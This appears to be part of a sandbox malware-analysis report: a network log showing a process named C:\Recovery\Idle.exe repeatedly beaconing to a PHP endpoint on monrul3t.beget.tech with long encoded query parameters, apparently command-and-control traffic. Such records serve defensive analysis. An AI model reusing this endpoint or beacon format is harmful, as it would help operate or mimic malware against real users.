                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            13192.168.2.4538555.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:26.479104996 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulUeNp2T5VlaPlXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:27.263874054 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            14192.168.2.4538925.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:32.276891947 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEeJp2T6lkaPpXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:33.038233042 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            15192.168.2.4539235.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:38.089009047 CET2949OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dFp2TxkkaPhXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Jan 11, 2025 18:08:38.841630936 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:38 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            16192.168.2.4539245.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:43.861398935 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dRp2Tz0kaPlXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:44.598997116 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            17192.168.2.4539255.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:49.621448994 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dBp2T1kkaPpXSqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:50.353018999 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:50 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            18192.168.2.4539265.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:08:55.370501995 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulkeBp2T61kaPhXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:08:56.127232075 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:08:56 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            19192.168.2.4539275.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:01.135586977 CET2947OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=QX9JiI6ICNmNGOkRzYlFjZzQjM1QzY0M2N0QWOzYTO2kTY2AzNkJCLiczNlVGO4EDMwQWOkFDN5Y2M0UTYyYDNzQjYyImY5YjN3kDZzEjY0gjI6ISZ2EGO1kzY5EGZjZ2M1YmM2UWMjZTY5ADNyQWOjJmYjJCLiQzY5UzNyEDOxcDO5gjZkJWM2MGO0cDM3YzY5EGOhRTOkRWNjhjNwIjI6ICNkhzMxUmYzUDM5cDZilzMhdzYlNGNxEWNwQGZmN2YhJyes0nI5EjbJNTTq90MNp2T6lkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:01.909024000 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:01 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
                                                                                            Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 7a 55 32 4e 7a 41 7a 59 30 49 6a 5a 6d 52 47 4e 78 55 47 5a 30 59 54 4e 6a 46 6a 4d 6d 42 54 4e 79 59 57 4d 31 49 57 4d 35 49 79 65 36 49 69 5a 77 59 54 59 31 4d 6d 59 7a 49 44 4d 33 55 47 4e 30 6b 6a 5a 77 63 54 59 35 45 6a 5a 30 51 6a 59 6b 52 57 5a 69 5a 57 4e 6a 4a 79 65
                                                                                            Data Ascii: ==Qf9JiI6IiYzU2NzAzY0IjZmRGNxUGZ0YTNjFjMmBTNyYWM1IWM5Iye6IiZwYTY1MmYzIDM3UGN0kjZwcTY5EjZ0QjYkRWZiZWNjJye


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            20192.168.2.4539285.101.152.15804476C:\Recovery\Idle.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Jan 11, 2025 18:09:06.939486980 CET2973OUTGET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dVp2TwEkaPFTQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOl [TRUNCATED]
                                                                                            Accept: */*
                                                                                            Content-Type: text/javascript
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                            Host: monrul3t.beget.tech
                                                                                            Connection: Keep-Alive
                                                                                            Jan 11, 2025 18:09:07.670844078 CET350INHTTP/1.1 200 OK
                                                                                            Server: nginx-reuseport/1.21.1
                                                                                            Date: Sat, 11 Jan 2025 17:09:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Content-Length: 104
                                                                                            Connection: keep-alive
                                                                                            Keep-Alive: timeout=30
                                                                                            Vary: Accept-Encoding
                                                                                            X-Powered-By: PHP/8.2.22
